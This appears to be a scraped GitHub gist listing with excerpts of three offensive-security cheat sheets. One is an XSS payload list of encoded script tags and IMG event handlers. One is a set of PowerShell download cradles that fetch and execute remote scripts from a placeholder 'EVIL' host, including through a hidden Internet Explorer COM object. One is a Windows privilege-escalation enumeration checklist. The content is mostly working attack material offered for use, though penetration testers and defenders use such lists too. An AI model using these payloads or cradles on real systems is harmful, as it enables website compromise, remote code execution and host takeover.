Chris "Lopi" Spehn ConsciousHacker

kurobeats / xss_vectors.txt

Last active February 18, 2026 13:07

XSS Vectors Cheat Sheet

	%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
	<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
	<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
	<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
	<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
	<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
	<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
	<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
	<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
	<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">

HarmJ0y / DownloadCradles.ps1

Last active April 3, 2026 23:46

Download Cradles

	# normal download cradle
	IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

	# PowerShell 3.0+
	IEX (iwr 'http://EVIL/evil.ps1')

	# hidden IE com object
	$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

	# Msxml2.XMLHTTP COM object

sckalath / windows_privesc

Last active January 22, 2026 09:20

Windows Privilege Escalation

	// What system are we connected to?
	systeminfo \| findstr /B /C:"OS Name" /C:"OS Version"

	// Get the hostname and username (if available)
	hostname
	echo %username%

	// Get users
	net users
	net user [username]